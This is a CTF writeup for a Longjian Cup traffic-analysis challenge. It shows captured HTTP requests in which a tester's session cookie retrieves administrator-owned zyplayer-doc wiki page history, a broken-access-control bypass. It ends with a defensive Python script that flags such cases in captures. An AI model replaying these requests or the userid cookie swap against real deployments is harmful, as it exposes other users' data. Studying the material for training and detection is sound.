
2nd 陇剑杯 (Longjian Cup) tcpdump_2 writeup

rain

Challenge

The attacker discovered an unauthorized-access (broken access control) vulnerability in the software.

writeup

1. Open the capture in Charles and filter on HTTP status code 200.

Two packets stand out. The first request is:

POST /user/message/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 31
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

sysType=2&pageNum=1&pageSize=20

Response:

{
  "data": [{
    "acceptUserId": 2,
    "creationTime": "2023-07-09 07:11:35",
    "dataDesc": "foo",
    "dataId": 4,
    "id": 18,
    "msgContent": "您修改了‘foo’",
    "msgStatus": 1,
    "msgType": 4,
    "operatorUserId": 2,
    "operatorUserName": "测试人员",
    "sysType": 2
  }, {
    "acceptUserId": 2,
    "creationTime": "2023-07-09 07:11:33",
    "dataDesc": "foo",
    "dataId": 4,
    "id": 17,
    "msgContent": "您创建了‘foo’",
    "msgStatus": 1,
    "msgType": 2,
    "operatorUserId": 2,
    "operatorUserName": "测试人员",
    "sysType": 2
  }],
  "errCode": 200,
  "pageNum": 1,
  "pageSize": 20,
  "total": 2,
  "totalPage": 1
}

A user was created. The second request is:

Request:

POST /user/info/selfInfo HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 0
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

Response:

{
  "data": {
    "createUid": 1,
    "creationTime": "2023-07-05 06:16:35",
    "delFlag": 0,
    "email": "foobar@foobar.com",
    "id": 2,
    "sex": 1,
    "updateTime": "2023-07-05 12:37:06",
    "userName": "测试人员",
    "userNo": "TMjpxFGQwD"
  },
  "errCode": 200
}

Administrator cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

Tester cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

A normal (correctly denied) request:

POST /zyplayer-doc-wiki/page/history/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 18
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

pageId=3&pageNum=1

Response:

{
  "errCode": 300,
  "errMsg": "您没有权限查看该空间的文章详情!"
}

The problematic request:

POST /zyplayer-doc-wiki/page/history/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 18
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

pageId=2&pageNum=1

Response:

{
  "data": [{
    "createTime": "2023-07-05 12:32:24",
    "createUserId": 1,
    "createUserName": "系统管理员",
    "id": 12,
    "pageId": 2
  }, {
    "createTime": "2023-07-05 12:28:09",
    "createUserId": 1,
    "createUserName": "系统管理员",
    "id": 7,
    "pageId": 2
  }, {
    "createTime": "2023-07-05 12:11:40",
    "createUserId": 1,
    "createUserName": "系统管理员",
    "id": 6,
    "pageId": 2
  }, {
    "createTime": "2023-07-05 12:11:36",
    "createUserId": 1,
    "createUserName": "系统管理员",
    "id": 5,
    "pageId": 2
  }],
  "errCode": 200,
  "pageNum": 1,
  "pageSize": 30,
  "total": 0,
  "totalPage": 0
}

The cookie used here is the tester's cookie (userid=2), yet the server returned page history records created by the administrator (createUserId=1) for pageId=2, even though the same user had just been denied for pageId=3.

So the flag for this challenge is accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2
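The manual triage above (compare who asked, what was denied, and what was served) can be automated over a set of request/response pairs pulled out of a capture. The script below is an added example, not part of the writeup; the sample exchanges are constructed from the requests and responses shown above (bodies shortened to the fields the checks need) and the cookie names, `errCode` convention and owner fields (`createUserId`, `createUid`, `operatorUserId`) are taken from those samples. It flags two things a reviewer would want to see: one `accessToken` presented together with more than one `userid` cookie value, and an endpoint that denied a user on one resource but returned another user's records on a different resource.

```python
"""Triage captured HTTP exchanges for authorization-bypass candidates.

Added example (not the writeup's own code). Input is a list of
(raw_request, json_response_body) pairs, e.g. exported from a proxy or pcap.
"""
import json
from urllib.parse import parse_qs

# Constructed samples modelled on the exchanges shown in the writeup.
SAMPLE_EXCHANGES = [
    (
        "POST /user/message/list HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
        "Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; "
        "zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1\r\n\r\n"
        "sysType=2&pageNum=1&pageSize=20",
        '{"data": [{"acceptUserId": 2, "id": 18}], "errCode": 200}',
    ),
    (
        "POST /zyplayer-doc-wiki/page/history/list HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
        "Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; "
        "zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2\r\n\r\n"
        "pageId=3&pageNum=1",
        '{"errCode": 300, "errMsg": "您没有权限查看该空间的文章详情!"}',
    ),
    (
        "POST /zyplayer-doc-wiki/page/history/list HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
        "Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; "
        "zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2\r\n\r\n"
        "pageId=2&pageNum=1",
        '{"data": [{"createUserId": 1, "id": 12, "pageId": 2}], "errCode": 200}',
    ),
]

# Field names observed in the captured responses/requests (assumption: they
# identify the record owner and the requested resource in this application).
OWNER_KEYS = ("createUserId", "createUid", "operatorUserId")
RESOURCE_KEYS = ("pageId", "dataId", "id")


def parse_cookie_header(value):
    """Parse 'a=1; b=x=' into a dict; split on the first '=' so base64-like
    values containing '=' survive intact."""
    cookies = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def parse_request(raw):
    """Split a raw HTTP request into method, path, cookies and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = parse_cookie_header(headers.get("cookie", ""))
    params = {k: v[0] for k, v in parse_qs(body).items()}
    return {"method": method, "path": path, "cookies": cookies, "params": params}


def find_access_control_findings(exchanges):
    """Return a list of findings; each is a dict with a 'kind' and details."""
    parsed = [(parse_request(req), json.loads(resp)) for req, resp in exchanges]
    findings = []

    # Check 1: the same session token shows up with different userid cookies,
    # which suggests identity is taken from a client-controlled value.
    users_per_token = {}
    for req, _ in parsed:
        token = req["cookies"].get("accessToken")
        uid = req["cookies"].get("userid")
        if token and uid:
            users_per_token.setdefault(token, set()).add(uid)
    for token, uids in users_per_token.items():
        if len(uids) > 1:
            findings.append({"kind": "token-shared-across-userids",
                             "accessToken": token, "userids": sorted(uids)})

    # Check 2: an endpoint denied (path, userid) once but elsewhere served that
    # user records owned by someone else -> inconsistent authorization.
    denied = {(req["path"], req["cookies"].get("userid"))
              for req, resp in parsed if resp.get("errCode") != 200}
    for req, resp in parsed:
        key = (req["path"], req["cookies"].get("userid"))
        if resp.get("errCode") != 200 or key not in denied:
            continue
        rows = resp.get("data")
        rows = rows if isinstance(rows, list) else [rows]
        owners = {str(row[k]) for row in rows if isinstance(row, dict)
                  for k in OWNER_KEYS if k in row}
        foreign = owners - {key[1]}
        if foreign:
            resource = {k: v for k, v in req["params"].items() if k in RESOURCE_KEYS}
            findings.append({"kind": "idor-candidate", "path": key[0],
                             "userid": key[1], "resource": resource,
                             "owners": sorted(foreign)})
    return findings


if __name__ == "__main__":
    for finding in find_access_control_findings(SAMPLE_EXCHANGES):
        print(json.dumps(finding, ensure_ascii=False))
```

On the sample data the script reports the shared `accessToken` used with `userid` 1 and 2, and the `/zyplayer-doc-wiki/page/history/list` request where `userid=2` received records owned by user 1 for `pageId=2` after being refused `pageId=3`. The second check deliberately requires a denial on the same endpoint before it flags anything, so endpoints that legitimately show other users' records (such as the message list) do not produce noise.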
